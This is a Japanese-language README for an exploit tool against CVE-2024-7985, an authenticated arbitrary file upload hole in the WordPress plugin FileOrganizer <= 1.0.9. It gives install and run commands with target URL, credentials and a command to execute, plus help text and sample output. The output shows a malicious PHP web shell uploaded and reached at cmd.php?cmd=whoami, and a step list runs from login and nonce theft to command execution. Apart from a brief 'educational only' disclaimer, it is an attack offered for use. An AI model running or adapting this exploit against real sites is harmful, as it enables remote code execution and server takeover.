
FileOrganizer <= 1.0.9 - 認証済み (Subscriber+) 任意のファイルアップロード
FileOrganizer <= 1.0.9 - 認証済み (Subscriber+) 任意ファイルアップロード
CVE-2024-7985 - WordPress プラグイン FileOrganizer <= 1.0.9 には、認証済みの任意ファイルアップロードの脆弱性があり、Subscriber+ 権限を持つ攻撃者が悪意のあるファイルをリモートでアップロードして実行できる可能性があります。この脆弱性は、fileorganizer_ajax_handler 関数におけるファイルタイプ検証の欠如に起因し、リモートコード実行 (RCE) が可能になります。
🚨 このエクスプロイトにより、攻撃者はサーバー上で任意のコマンドを実行できます! 🚨
requestsbeautifulsoup4依存関係のインストール:
pip install requests beautifulsoup4
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi
options:
-h, --help show this help message and exit
--url URL Target WordPress site URL
--username USERNAME WordPress Username
--password PASSWORD WordPress Password
--cmd CMD Command to execute in uploaded file
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami
1️⃣ バージョン確認 - サイトが脆弱かどうかを判定します。 2️⃣ 認証 - WordPress にログインします。 3️⃣ nonce 抽出 - セキュリティトークンを取得します。 4️⃣ ファイルアップロード - 悪意のある PHP スクリプトをアップロードします。 5️⃣ コマンド実行 - ユーザー指定のコマンドを実行します。
このスクリプトは教育目的のみで提供されます。作者は、誤用やその結果について一切の責任を負いません。🚨